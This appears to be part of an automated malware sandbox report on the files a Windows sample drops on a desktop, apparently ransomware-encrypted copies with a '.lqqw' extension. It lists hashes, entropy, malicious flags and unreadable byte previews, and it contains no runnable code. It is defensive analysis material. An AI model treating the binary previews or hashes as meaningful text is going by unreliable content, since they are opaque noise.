                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8432785080875504
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KXgmt6RMLzEV0ndXTbFUIcmv5lRXCYzoxDplPugFo34IUZmkHuTybD:agm0RSEV0ndHFUINv5lWFl68mk8gD
                                                                                                                                                                                                    MD5:AA4657721034880A9DF8511ECC1E06DC
                                                                                                                                                                                                    SHA1:8BE40DCDB447CBF422C07E358C9AB7472E2CD452
                                                                                                                                                                                                    SHA-256:9614AD3345E316E45867BC83BBC7E3DB9A42F8611F991E12FD9AE9D8FFC6B160
                                                                                                                                                                                                    SHA-512:CC5BB0091D9B78FBB52B5A90C7EE0C1FD7A8B54D54F93341F720BFCB8F840662707EAC1396C2DD7B8495BC4759104E72F324FEF163A9DEA72D61B0408999518F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..............q..l....1HA..>.$..sGH@...+...+..'.}+o..0R..J.6r*a9F!.....tW/..n.K...K...7>.D.Z...G.gF..x..l.:.D.q..T#.z.8.h..5....9.>...&....J.M........*=....p#Y.4.i.....s....lb..pj..zb.U..@...9.wy...5....D.....EBz..F.....[>phi/G\.s6cj....P..(...C..we.Z..2..j..!"......2.?.N..(.H.....-....@.dT..)q..F..f.s$.9.>.$B...?...G...X..;,h....#....m.q..aE.........>..AoI...\....@!2...u:(.%..fU.?....N.F..f}.....tq9]3..-..~..U..t....*J...h...rAh.P........dS..{.L....^.v.R....=wp..d........&*..0s.1....."*..Pa...8.V.~.C.g..Jv...*7..z.........3 R.<.M+....P...e..e..8.'.E.d.2.$.j.^..Y.Fl.vI..G............}..:.z..Y..p..v.#/n..x....^..8.i8.1.*........kl.V..66c.p8&..Y.....N...m./.y=N..G.m.CdF&S{qG?.a...{.O...2...q...a..":...I.Z*...e.}@..Z..gaah.x.R.).h7.[..T\~|...4.g...}.l...Fz...W.....o....Q..pT}..wn]...,.[.0.q....8.~.\N.........we#...2T.A..v..K...X.c...M..d}.......3..N?9.~Uu.L.h.EA.......R~t.......m...77Y....U8I...>...h....l.P...:...-.....=....
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847809103706993
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:A8wgpvREfMdpIRAmslUy3P7JiuQO49LwFKdQQcKc3RBvj78jgZdFfpovJKGcbD:AlgpkOOX8P7JNQJwFNKc3rXJaRMD
                                                                                                                                                                                                    MD5:CBE87E0CE552601664DB4529D0CCDD00
                                                                                                                                                                                                    SHA1:1ED8DAD736BF046023866409217E175F7D20C9DB
                                                                                                                                                                                                    SHA-256:57B6C08E3D2AC93DCA534C2698EE4319CDFFF06A216088609FB4D8D84D9968DC
                                                                                                                                                                                                    SHA-512:5F2E03FE649F32473065A92612C81AC76B095380413BAF0FA19BE689DC170A9343B3AB8D95AD6CE61143DB7292F406450412C83B593F1359CDBF36BC0F13603B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3.K.d..om0..TF.P.....u.E......t...=...."S.L..._.u....ZQ......b...:..6$..?L3.C.B.ozk..X....SG.i&....;.W..\;ir..tf..c-..zz.uu."w......YN.....V?......a..jXj.w.C..-m.S..M.....4...D<].t.z....V.Q].v....s.....m.K.Lg.."....f.v...NDm@.6.7U.q...@U.\.K..V.-Z.s.....h.x....+.....`..%%..eX...OT..;d9Y....Ay...ZKsAw-....{....H..3.......tI.Z,...}.P...e.H..ER....$.....t.y.|9x.pL.H".]?..q{rI.;\;.....W..].!~...wmq.......3.AL..]..:...;]..c1o..g./....A....\c;.{[...kt..i...%........m....3t.....h.....E.W........$...!.x...[.c6f.`<c...>js8.......4{....v..............U...=-0VxUO(SN....x...N...>LY.I0S....-..U.$s.=Mf.\%.K.^cm.&...I..y.f...I........}../.8s.<.8F.........E.W..x.|.$...E....t....<..././...a..G.U...(3t..a..G"tw...Q..m..;..,i...s6..*..?. .....5..l.z...#...../.R...w..\...R...<Lu...Anv.%}(....S&...........Z.K7d~.:?.E.fu.xt...`J/.1._.>....]...K.6.?....b.......Hi.u...c.....Z......|..b))?g!GLI.....~$..C...q..c.w............'../+'30...`..lk...y.....Mz\...|
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847809103706993
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:A8wgpvREfMdpIRAmslUy3P7JiuQO49LwFKdQQcKc3RBvj78jgZdFfpovJKGcbD:AlgpkOOX8P7JNQJwFNKc3rXJaRMD
                                                                                                                                                                                                    MD5:CBE87E0CE552601664DB4529D0CCDD00
                                                                                                                                                                                                    SHA1:1ED8DAD736BF046023866409217E175F7D20C9DB
                                                                                                                                                                                                    SHA-256:57B6C08E3D2AC93DCA534C2698EE4319CDFFF06A216088609FB4D8D84D9968DC
                                                                                                                                                                                                    SHA-512:5F2E03FE649F32473065A92612C81AC76B095380413BAF0FA19BE689DC170A9343B3AB8D95AD6CE61143DB7292F406450412C83B593F1359CDBF36BC0F13603B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3.K.d..om0..TF.P.....u.E......t...=...."S.L..._.u....ZQ......b...:..6$..?L3.C.B.ozk..X....SG.i&....;.W..\;ir..tf..c-..zz.uu."w......YN.....V?......a..jXj.w.C..-m.S..M.....4...D<].t.z....V.Q].v....s.....m.K.Lg.."....f.v...NDm@.6.7U.q...@U.\.K..V.-Z.s.....h.x....+.....`..%%..eX...OT..;d9Y....Ay...ZKsAw-....{....H..3.......tI.Z,...}.P...e.H..ER....$.....t.y.|9x.pL.H".]?..q{rI.;\;.....W..].!~...wmq.......3.AL..]..:...;]..c1o..g./....A....\c;.{[...kt..i...%........m....3t.....h.....E.W........$...!.x...[.c6f.`<c...>js8.......4{....v..............U...=-0VxUO(SN....x...N...>LY.I0S....-..U.$s.=Mf.\%.K.^cm.&...I..y.f...I........}../.8s.<.8F.........E.W..x.|.$...E....t....<..././...a..G.U...(3t..a..G"tw...Q..m..;..,i...s6..*..?. .....5..l.z...#...../.R...w..\...R...<Lu...Anv.%}(....S&...........Z.K7d~.:?.E.fu.xt...`J/.1._.>....]...K.6.?....b.......Hi.u...c.....Z......|..b))?g!GLI.....~$..C...q..c.w............'../+'30...`..lk...y.....Mz\...|
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84423806115299
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:l9N517CDdsM/f66WjUPirwsTwzk8hdSZIJJqXj8FSodQ78Rb7JVqYIbD:PFudsM/f662rwKwzkIxJJMYFSodW8Rb6
                                                                                                                                                                                                    MD5:5EBCE43527557D56D0195D5F86FBFC28
                                                                                                                                                                                                    SHA1:AFFC588662E0566D06DB4F01B8F1B61309C4FF06
                                                                                                                                                                                                    SHA-256:436C71ADCE15A6D853F33CA0A36FCDE03C8D2FDD75257B4AA360DB13129E33F9
                                                                                                                                                                                                    SHA-512:F657DAF35D21647B806C4C5E5AD88867E99AF1E14A8B52B3830D68C1E4F1769793053DBEBB9B10608CE9B12BDE4F005C94DFA2FDF2BC1900E4DC609793201AA1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........q{c).a@......n.-.n>z..c./a..4.`tr..%...y...=.!..TN....o.......h.TP0>i&.K;l.......P..q...*.-g.r...[#..ga....Y.N`...hc..D&.ImJ..."_/)(..-$>.<...g.p..*C..#..6.y....+....c}Q...x....X{..F..) ^..e...>.8.xYH.$..{..d..k...`..H....#[@.*....1..{...X6......P.W...QoH'V0..]..Z.3..2....m.NE......EV.).P...,...!.H_.i...E!....Y..F0[=D....t..z.h..8RQ9..i".1W.|A.y..c..=l...#L.%......:....n.....?].E.Z.....YXi..yh#......w...@W..x.Ju."M.t=p.Jr.2..$..\rz..........Gg.j.......fX.....D.../...s..2....?..P.j.... >..'....@..j.fT.(.jz.(..........)W5U...pp.{JaH.%.0.u.y9..v..gs...r.....p....V$^]A.a..:....(...w..z.....Q.xU;2...e.>jJ.<.....G..N...$K.!..o}.<.b..d....._..q..q..?.H.E%.8..>+4.F.."..%........4.K..qkGN..7..5j.)<..5~..Y.. .._D.Z\.~../.o.i..0../AtV..fc.R.b....7>.+...;\....8.r...5/"..u..U.m.T.kb._,..C........4.>.[./oa7^..X..g..@...?l......../{R~.@...6V..../q..9B2..h0`.o.|..HMk%..=*W.8..7.H..[...dJ17..\..aG..-.L...)....R.._..."B.\z3..%6{a'K....>h3\.Xk.
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.84423806115299
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:l9N517CDdsM/f66WjUPirwsTwzk8hdSZIJJqXj8FSodQ78Rb7JVqYIbD:PFudsM/f662rwKwzkIxJJMYFSodW8Rb6
                                                                                                                                                                                                    MD5:5EBCE43527557D56D0195D5F86FBFC28
                                                                                                                                                                                                    SHA1:AFFC588662E0566D06DB4F01B8F1B61309C4FF06
                                                                                                                                                                                                    SHA-256:436C71ADCE15A6D853F33CA0A36FCDE03C8D2FDD75257B4AA360DB13129E33F9
                                                                                                                                                                                                    SHA-512:F657DAF35D21647B806C4C5E5AD88867E99AF1E14A8B52B3830D68C1E4F1769793053DBEBB9B10608CE9B12BDE4F005C94DFA2FDF2BC1900E4DC609793201AA1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........q{c).a@......n.-.n>z..c./a..4.`tr..%...y...=.!..TN....o.......h.TP0>i&.K;l.......P..q...*.-g.r...[#..ga....Y.N`...hc..D&.ImJ..."_/)(..-$>.<...g.p..*C..#..6.y....+....c}Q...x....X{..F..) ^..e...>.8.xYH.$..{..d..k...`..H....#[@.*....1..{...X6......P.W...QoH'V0..]..Z.3..2....m.NE......EV.).P...,...!.H_.i...E!....Y..F0[=D....t..z.h..8RQ9..i".1W.|A.y..c..=l...#L.%......:....n.....?].E.Z.....YXi..yh#......w...@W..x.Ju."M.t=p.Jr.2..$..\rz..........Gg.j.......fX.....D.../...s..2....?..P.j.... >..'....@..j.fT.(.jz.(..........)W5U...pp.{JaH.%.0.u.y9..v..gs...r.....p....V$^]A.a..:....(...w..z.....Q.xU;2...e.>jJ.<.....G..N...$K.!..o}.<.b..d....._..q..q..?.H.E%.8..>+4.F.."..%........4.K..qkGN..7..5j.)<..5~..Y.. .._D.Z\.~../.o.i..0../AtV..fc.R.b....7>.+...;\....8.r...5/"..u..U.m.T.kb._,..C........4.>.[./oa7^..X..g..@...?l......../{R~.@...6V..../q..9B2..h0`.o.|..HMk%..=*W.8..7.H..[...dJ17..\..aG..-.L...)....R.._..."B.\z3..%6{a'K....>h3\.Xk.
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848507491675119
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Cn68bOM86wJWsCmFnpzC/uKO7lzuy++Gp5Cb0M6OjrihMIaLtoWa2XbD:k/86wEsCmxpm27Ey/a2QOnuMHtRD
                                                                                                                                                                                                    MD5:BEBF4B0C64C4962F7570E1388EF841A5
                                                                                                                                                                                                    SHA1:67F9ABD6E450CEF118EA243F69A37D7332C24A8B
                                                                                                                                                                                                    SHA-256:B0D8F9B3A6BE82115BB39A6F4241F80C9BC766A216D33FF1DAB2CADE79272013
                                                                                                                                                                                                    SHA-512:A9DD256C6F48612C7962AF526DEDA88D06FC01F62BF7FFDB7B0F36D17C6BDA27D9CC4F92A0902C05782BB7001B1AFC36AFEAB15DBE92E8639021824017878E56
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..@RO....B"...@......K...sA....v..m..f......t..D.1...,g]...@.tE'y(!...z....Ju.;..9x...Z.J....(.,h.U...].\..}W.....J]-{..t....X"..X..%.U`.h-...$.2.,.u.=.F.....c..........mD.31.;\..M.R5.<6gf.g...+DO.. ...%.*...L......&.<..U..M....w..y...cbek[G..H..n..={l.z.J..D......+.&.WN%3..F.qX..7..q....b..x.Fz.).t.@.....t/.(..2.....8].."..a.`....<.z..=..P.0.&..q.M>...YS...z......./7.K[...."..y.~o...z.=...0:.<....^...w.{.H4...%...r/:_....*...nf.u....y.8...T..|.-..5.F...yz.@b..}......g%...WyF....Lh.....,..8.n....3...N;.1.@.....~9....x..hgC.....6.]...j.....5B....f...3u.i.d.qq.m..Q.....[p...M.Q...#X....Cd.......r..UK....].{.b^...y..........V..,((.8V.q..&_<.)..S^*.1C.}.r.X\/Y....r.Y..S...Y.I.K....!f.H.<k.._L....'Ez8x..S*..}.H..V.L.nP.9.J..4.....<.y........!...Xc..q ..sMt......0t......3.Fe.B...l..}o.8.v..V_.kDf,.....k.8.&..oP./.mW...v...........<....U.......C....(:]...=....y.I....h.1.....i.I ....`...J=..D,.....X0.&QV...;1,.x].. a....VI.8a..j..N...7.e^.N1.r...u.}.....
                                                                                                                                                                                                    C:\Users\user\Desktop\EIVQSAOTAQ.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848507491675119
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Cn68bOM86wJWsCmFnpzC/uKO7lzuy++Gp5Cb0M6OjrihMIaLtoWa2XbD:k/86wEsCmxpm27Ey/a2QOnuMHtRD
                                                                                                                                                                                                    MD5:BEBF4B0C64C4962F7570E1388EF841A5
                                                                                                                                                                                                    SHA1:67F9ABD6E450CEF118EA243F69A37D7332C24A8B
                                                                                                                                                                                                    SHA-256:B0D8F9B3A6BE82115BB39A6F4241F80C9BC766A216D33FF1DAB2CADE79272013
                                                                                                                                                                                                    SHA-512:A9DD256C6F48612C7962AF526DEDA88D06FC01F62BF7FFDB7B0F36D17C6BDA27D9CC4F92A0902C05782BB7001B1AFC36AFEAB15DBE92E8639021824017878E56
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..@RO....B"...@......K...sA....v..m..f......t..D.1...,g]...@.tE'y(!...z....Ju.;..9x...Z.J....(.,h.U...].\..}W.....J]-{..t....X"..X..%.U`.h-...$.2.,.u.=.F.....c..........mD.31.;\..M.R5.<6gf.g...+DO.. ...%.*...L......&.<..U..M....w..y...cbek[G..H..n..={l.z.J..D......+.&.WN%3..F.qX..7..q....b..x.Fz.).t.@.....t/.(..2.....8].."..a.`....<.z..=..P.0.&..q.M>...YS...z......./7.K[...."..y.~o...z.=...0:.<....^...w.{.H4...%...r/:_....*...nf.u....y.8...T..|.-..5.F...yz.@b..}......g%...WyF....Lh.....,..8.n....3...N;.1.@.....~9....x..hgC.....6.]...j.....5B....f...3u.i.d.qq.m..Q.....[p...M.Q...#X....Cd.......r..UK....].{.b^...y..........V..,((.8V.q..&_<.)..S^*.1C.}.r.X\/Y....r.Y..S...Y.I.K....!f.H.<k.._L....'Ez8x..S*..}.H..V.L.nP.9.J..4.....<.y........!...Xc..q ..sMt......0t......3.Fe.B...l..}o.8.v..V_.kDf,.....k.8.&..oP./.mW...v...........<....U.......C....(:]...=....y.I....h.1.....i.I ....`...J=..D,.....X0.&QV...;1,.x].. a....VI.8a..j..N...7.e^.N1.r...u.}.....
                                                                                                                                                                                                    C:\Users\user\Desktop\EOWRVPQCCS.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.832986438185053
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:whwztv7jUK1gH5U3nS7NJj1jBg85gy+y0RyUH4CK3cMVwmi9Vblc/wTDbD:d2moNJE85AzbTIzVL4VblWwDD
                                                                                                                                                                                                    MD5:BD3B1A8CB96F9081D04D6D6C807669BC
                                                                                                                                                                                                    SHA1:92ADD7E86E153565C044656ABC4A7A30B44462D8
                                                                                                                                                                                                    SHA-256:45E16DB385E6DAFE85FB51FCDFC1D124BF574C41BD46A97456BB1584C309D0F0
                                                                                                                                                                                                    SHA-512:6E1EFBAF46A8F1E04DE5BB7FDD5AB48F9F9271B8362386C9B9D6C23AB23EFFB399B35DAABD610B0F789BC81F92CAC4907AE52F5BEDB4D6A15FEDEAF126B0898E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: S..A...vp6...W.....}~.....B^H..%....T..W.D# Yz.(<.{.p8...,)R..6....D...l.\....).......xQ.7}...jmN)VP.....*.JS.>..:.!..T....s.th.&oi@.&;z..hU.=.].....{#a...........k..,.%T8#Y.!.".....S.5....A........ANxH.....F;of0..s.;8I."..MN..r.jh.4ae.......4........R.K!"/..u4.........\...@.3im.dJ..sUg......$wZ.....W.P.p...K...)..w..pC.&...Q..........x..g.}.x.|.X...n.S..E.hsdx....]Z.Iv.........V....>.e.$-..16...F9.....f.y.~/?.1....\....5..teK...c.m...77)5..x....z..6..%....v.1....#.j.o..e..8..... Y..&.O.'.......Q:.W.....q.....a.6..v.&+.u.8.....p|X.fP9D..gF.'...a`..6...IZR.xW|-.....r:J..@Z..{.;YMW6vE....S7~..e.:..4....i....K$1.c.%..V.R+~}.u...x......E.^-..,.A17.}..S[C(e..N;...Y..B.H.]..aTn..T.....5..`.....3.W?....&...D..Up.q..G.'......t.?...E..j.L3...J... fD.....`.D..OF.w......./..A.v....F.........F.U.....M.......`9.c........7U..&.6.....T..?...Vlax.F...y.u}..PN.@..V....c E...?..,...[........{..K&a0.<3.O.N!I...e..lV.%.~s.,........p.......2..w.v.....t\.....e..
                                                                                                                                                                                                    C:\Users\user\Desktop\EOWRVPQCCS.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.832986438185053
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:whwztv7jUK1gH5U3nS7NJj1jBg85gy+y0RyUH4CK3cMVwmi9Vblc/wTDbD:d2moNJE85AzbTIzVL4VblWwDD
                                                                                                                                                                                                    MD5:BD3B1A8CB96F9081D04D6D6C807669BC
                                                                                                                                                                                                    SHA1:92ADD7E86E153565C044656ABC4A7A30B44462D8
                                                                                                                                                                                                    SHA-256:45E16DB385E6DAFE85FB51FCDFC1D124BF574C41BD46A97456BB1584C309D0F0
                                                                                                                                                                                                    SHA-512:6E1EFBAF46A8F1E04DE5BB7FDD5AB48F9F9271B8362386C9B9D6C23AB23EFFB399B35DAABD610B0F789BC81F92CAC4907AE52F5BEDB4D6A15FEDEAF126B0898E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: S..A...vp6...W.....}~.....B^H..%....T..W.D# Yz.(<.{.p8...,)R..6....D...l.\....).......xQ.7}...jmN)VP.....*.JS.>..:.!..T....s.th.&oi@.&;z..hU.=.].....{#a...........k..,.%T8#Y.!.".....S.5....A........ANxH.....F;of0..s.;8I."..MN..r.jh.4ae.......4........R.K!"/..u4.........\...@.3im.dJ..sUg......$wZ.....W.P.p...K...)..w..pC.&...Q..........x..g.}.x.|.X...n.S..E.hsdx....]Z.Iv.........V....>.e.$-..16...F9.....f.y.~/?.1....\....5..teK...c.m...77)5..x....z..6..%....v.1....#.j.o..e..8..... Y..&.O.'.......Q:.W.....q.....a.6..v.&+.u.8.....p|X.fP9D..gF.'...a`..6...IZR.xW|-.....r:J..@Z..{.;YMW6vE....S7~..e.:..4....i....K$1.c.%..V.R+~}.u...x......E.^-..,.A17.}..S[C(e..N;...Y..B.H.]..aTn..T.....5..`.....3.W?....&...D..Up.q..G.'......t.?...E..j.L3...J... fD.....`.D..OF.w......./..A.v....F.........F.U.....M.......`9.c........7U..&.6.....T..?...Vlax.F...y.u}..PN.@..V....c E...?..,...[........{..K&a0.<3.O.N!I...e..lV.%.~s.,........p.......2..w.v.....t\.....e..
                                                                                                                                                                                                    C:\Users\user\Desktop\EOWRVPQCCS.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.852513860821638
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FKmjE5tkCNloKNZNABvwgrdfSkeiIesBuookUmtN/34ShnP44dGOc75J9/fP22Zy:FIzDNyKNQIcNXK0KDHhYlJ93qKMD
                                                                                                                                                                                                    MD5:8385A4B1883BB6EE4829B266B017A287
                                                                                                                                                                                                    SHA1:C3686DCF0B46B8655C19A1B71CF7579D31D513DA
                                                                                                                                                                                                    SHA-256:EF39745F4B368D71A52F332CE607D2919197FF6A6B9C2E159060A4BA8BE9C648
                                                                                                                                                                                                    SHA-512:21B3229210F122F2E6897DA44C97BD34DF41BD2E57F1C49DE46ED70736AF0EBC964E56BD27E5523B89A87DF559DA75A257B9A052AE7F6A541BE19370D0A12561
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /..:G...{Y..;..o.. 5.{S...4...J\.....q.=.{.......84.....W........U..;O.c:.~...6.W#[.Jp.9.[ .6..7j.C.I[.^..{].t....m..J..s....``..e.0.q.Mh...W..*.....:....6d....c.HX..V5..MN(.Xy<M..@Gy.............8..s.m. ...Sz...h&O.b.#e.....L.I.v.....?..U]o#h.R.Z.+J..F4.d9'E3.9@}...Ho...o..q...a...p....)...N=n"...2..p&..'...y.T._.Y.8.}hW...#.y..q-......~u..?...U.*CKx....T...p........SV.o..a.Xa5\.$...G..1...U?.;.K.!.f.0.....r.Oh~Z.@94."...O. ..*3_.S..B..H.....u.W.@.....}...!.2...X@..k...S..H[....._.......}..`.rR.c...._..@.q'`+].Z@.jr.r.E&.m....b.`.Lh..B.M..../``.,.'.|L.....7...`....QD...........-.g....yV..(...MT.....D.&n,..k........B.G.H#{{OP.{ ..U).?./...../.p1./.J.q;.aCz.....F...^,.P,.., .4.~F>.[.".DI....;..O'.0..E.w`s{$....&x~.."v....$..A.....9x3..~.@-.e.W&;..zxS.M..E[...i..G.b..96>..r.zL..)+.v.mv?Q.#..+m..XJ..,W.<.+.`...b%.cI2.X.......bGG..yc.........U.&.;.G..~.c..........%.H..Q....G.....:+*.w....).k.3.y..!.7...]..........a......5MtT.O.-.....M...\.|...X..1.X7.n.T`.$
                                                                                                                                                                                                    C:\Users\user\Desktop\EOWRVPQCCS.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.852513860821638
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FKmjE5tkCNloKNZNABvwgrdfSkeiIesBuookUmtN/34ShnP44dGOc75J9/fP22Zy:FIzDNyKNQIcNXK0KDHhYlJ93qKMD
                                                                                                                                                                                                    MD5:8385A4B1883BB6EE4829B266B017A287
                                                                                                                                                                                                    SHA1:C3686DCF0B46B8655C19A1B71CF7579D31D513DA
                                                                                                                                                                                                    SHA-256:EF39745F4B368D71A52F332CE607D2919197FF6A6B9C2E159060A4BA8BE9C648
                                                                                                                                                                                                    SHA-512:21B3229210F122F2E6897DA44C97BD34DF41BD2E57F1C49DE46ED70736AF0EBC964E56BD27E5523B89A87DF559DA75A257B9A052AE7F6A541BE19370D0A12561
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /..:G...{Y..;..o.. 5.{S...4...J\.....q.=.{.......84.....W........U..;O.c:.~...6.W#[.Jp.9.[ .6..7j.C.I[.^..{].t....m..J..s....``..e.0.q.Mh...W..*.....:....6d....c.HX..V5..MN(.Xy<M..@Gy.............8..s.m. ...Sz...h&O.b.#e.....L.I.v.....?..U]o#h.R.Z.+J..F4.d9'E3.9@}...Ho...o..q...a...p....)...N=n"...2..p&..'...y.T._.Y.8.}hW...#.y..q-......~u..?...U.*CKx....T...p........SV.o..a.Xa5\.$...G..1...U?.;.K.!.f.0.....r.Oh~Z.@94."...O. ..*3_.S..B..H.....u.W.@.....}...!.2...X@..k...S..H[....._.......}..`.rR.c...._..@.q'`+].Z@.jr.r.E&.m....b.`.Lh..B.M..../``.,.'.|L.....7...`....QD...........-.g....yV..(...MT.....D.&n,..k........B.G.H#{{OP.{ ..U).?./...../.p1./.J.q;.aCz.....F...^,.P,.., .4.~F>.[.".DI....;..O'.0..E.w`s{$....&x~.."v....$..A.....9x3..~.@-.e.W&;..zxS.M..E[...i..G.b..96>..r.zL..)+.v.mv?Q.#..+m..XJ..,W.<.+.`...b%.cI2.X.......bGG..yc.........U.&.;.G..~.c..........%.H..Q....G.....:+*.w....).k.3.y..!.7...]..........a......5MtT.O.-.....M...\.|...X..1.X7.n.T`.$
                                                                                                                                                                                                    C:\Users\user\Desktop\GIGIYTFFYT.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.820529971126834
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KRVL65FFQ2qqqig8oEHihoXUipYyguxX+QkR9WZ0Gs206XXmeulOvUdkinFilbD:s6VQ2LihoXZphvxXVBJ66XXKlOvakiF8
                                                                                                                                                                                                    MD5:E025C812A2E375ED6D0AD3E2895426EE
                                                                                                                                                                                                    SHA1:676AB8BA0EB5D059946EF46BAAE12B81A290E906
                                                                                                                                                                                                    SHA-256:DAC369364B6586CA2316E48B86D6B99CEA8FBF6C7422E07883F60C0F03C6E995
                                                                                                                                                                                                    SHA-512:77A2CA53BA17B0B7937190DDA4BD11F59520A755CD5593A21D36E77E9C4D4FF525F476B0B2385EDEF0A61A2E7B39D20859DD70F6E65E158B97892B5BB2B248B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
